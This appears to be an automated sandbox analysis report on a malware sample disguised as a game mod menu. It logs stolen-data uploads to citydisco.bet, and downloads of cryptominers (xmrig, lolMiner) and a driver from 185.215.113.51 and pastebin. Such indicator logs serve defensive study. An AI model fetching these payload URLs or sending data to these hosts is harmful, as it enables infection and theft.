                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O2B9qr440User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8743Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6pg17UTy0lMDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20411Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=aZuGrj1akvjQsBYAk7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2581Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=v6E04UMAKNhfNEWZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569846Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: POST /aNzS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 99Host: mrodularmall.top
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: global trafficHTTP traffic detected: GET /raw/YpJeSRBC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveHost: 185.215.113.51
                  Source: global trafficHTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: citydisco.bet
                  Source: global trafficDNS traffic detected: DNS query: featureccus.shop
                  Source: global trafficDNS traffic detected: DNS query: mrodularmall.top
                  Source: global trafficDNS traffic detected: DNS query: pastebin.com
                  Source: unknownHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 04:46:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-frame-options: DENYx-frame-options: DENYx-content-type-options: nosniffx-content-type-options: nosniffx-xss-protection: 1;mode=blockx-xss-protection: 1;mode=blockcache-control: public, max-age=1801CF-Cache-Status: HITAge: 1231Server: cloudflareCF-RAY: 91f8e39b794d4674-DFW
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.0000000002AFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394339673.000000000161D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394339673.000000000161D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/E
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.00000000029D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/WatchDog.exe
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016824681.0000000001665000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmp, 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000000.1416561359.0000000000662000.00000002.00000001.01000000.00000008.sdmp, 1C2NX3IUVJPXMLDGP.exe.2.drString found in binary or memory: http://185.215.113.51/WatchDog.exeEhttp://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.ex
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.0000000002B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/WatchDog.exeP
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394581010.0000000001660000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.0000000001657000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2017416574.000000000165D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/WatchDogjj
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.00000000029D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/WinRing0x64.sys
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016824681.0000000001665000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmp, 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000000.1416561359.0000000000662000.00000002.00000001.01000000.00000008.sdmp, 1C2NX3IUVJPXMLDGP.exe.2.drString found in binary or memory: http://185.215.113.51/WinRing0x64.sysChttps://pastebin.com/raw/YpJeSRBC
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.0000000002B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/WinRing0x64.sysP
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394339673.000000000161D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/conhost.exe
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394381912.000000000162D000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2018544674.000000000162C000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/conhost.exeG
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.00000000029D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/lolMiner.exe
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.00000000029D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/xmrig.exe
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.0000000002AFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/xmrig.exeP
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.0000000002B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51D
                  Source: Kiddion's Modest Menu v.1.0.0.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1233835511.0000000003C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1233835511.0000000003C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: Kiddion's Modest Menu v.1.0.0.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: Kiddion's Modest Menu v.1.0.0.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: Kiddion's Modest Menu v.1.0.0.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: Kiddion's Modest Menu v.1.0.0.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                  Source: WinRing0x64.sys.14.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                  Source: WinRing0x64.sys.14.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.0000000002B26000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.14.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.0000000002B26000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.14.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1233835511.0000000003C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1233835511.0000000003C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1233835511.0000000003C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: Kiddion's Modest Menu v.1.0.0.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: Kiddion's Modest Menu v.1.0.0.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1233835511.0000000003C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: Kiddion's Modest Menu v.1.0.0.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1233835511.0000000003C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: powershell.exe, 00000011.00000002.1442060312.0000000005F7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: Kiddion's Modest Menu v.1.0.0.exeString found in binary or memory: http://ocsp.digicert.com0
                  Source: Kiddion's Modest Menu v.1.0.0.exeString found in binary or memory: http://ocsp.digicert.com0A
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000000.00000002.1223220074.0000000000F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0
                  Source: Kiddion's Modest Menu v.1.0.0.exeString found in binary or memory: http://ocsp.entrust.net02
                  Source: Kiddion's Modest Menu v.1.0.0.exeString found in binary or memory: http://ocsp.entrust.net03
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1233835511.0000000003C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.0000000002AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.0000000002AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.comd
                  Source: powershell.exe, 00000011.00000002.1438828249.0000000005066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000011.00000002.1438828249.0000000005066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.0000000002AA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1438828249.0000000004F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000011.00000002.1438828249.0000000005066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                  Source: powershell.exe, 00000011.00000002.1438828249.0000000005066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: Kiddion's Modest Menu v.1.0.0.exeString found in binary or memory: http://www.digicert.com/CPS0
                  Source: Kiddion's Modest Menu v.1.0.0.exeString found in binary or memory: http://www.entrust.net/rpa03
                  Source: powershell.exe, 00000011.00000002.1444267971.0000000007668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1233835511.0000000003C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1233835511.0000000003C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1166088583.0000000003C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                  Source: powershell.exe, 00000011.00000002.1438828249.0000000004F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1235479855.000000000163F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1235479855.000000000163F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1166088583.0000000003C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1166088583.0000000003C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1166088583.0000000003C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1270508877.0000000001648000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1363602241.0000000001615000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394339673.000000000161D000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1233569774.0000000001648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1270508877.0000000001648000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1233569774.0000000001648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/37
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1363602241.0000000001615000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394339673.000000000161D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/H
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1363602241.0000000001615000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394339673.000000000161D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/W
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1270865320.0000000001607000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1200209846.0000000001656000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2017495532.0000000001604000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1363634962.0000000001604000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1306812533.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1274752832.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1306793258.0000000001604000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1234034802.0000000001632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJIS
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1274915003.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1306812533.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1274752832.00000000015BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJIS2
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1166390530.0000000001641000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1166411608.0000000001655000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJIS;
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1274915003.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1233626072.0000000001632000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394143560.00000000015DA000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1306812533.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1274752832.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1234034802.0000000001632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISP
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1200238178.0000000001658000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1200209846.0000000001656000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1200574188.0000000001656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISTd3J
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1166390530.0000000001641000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1166411608.0000000001655000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1200209846.0000000001656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISime
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1363602241.0000000001615000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394339673.000000000161D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/kf
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1270789097.0000000001648000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1270508877.0000000001648000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1233569774.0000000001648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/t
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1363602241.0000000001615000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394339673.000000000161D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/z
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1200264344.0000000001605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/~
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1235479855.000000000163F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1235479855.000000000163F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: powershell.exe, 00000011.00000002.1442060312.0000000005F7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000011.00000002.1442060312.0000000005F7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000011.00000002.1442060312.0000000005F7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1166088583.0000000003C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1166088583.0000000003C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1166088583.0000000003C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394381912.000000000162D000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2018544674.000000000162C000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://featureccus.shop/
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394339673.000000000161D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://featureccus.shop/bdMAn
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1166088583.0000000003C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                  Source: powershell.exe, 00000011.00000002.1438828249.0000000005066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1235479855.000000000163F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394381912.000000000162D000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2018544674.000000000162C000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mrodularmall.top/
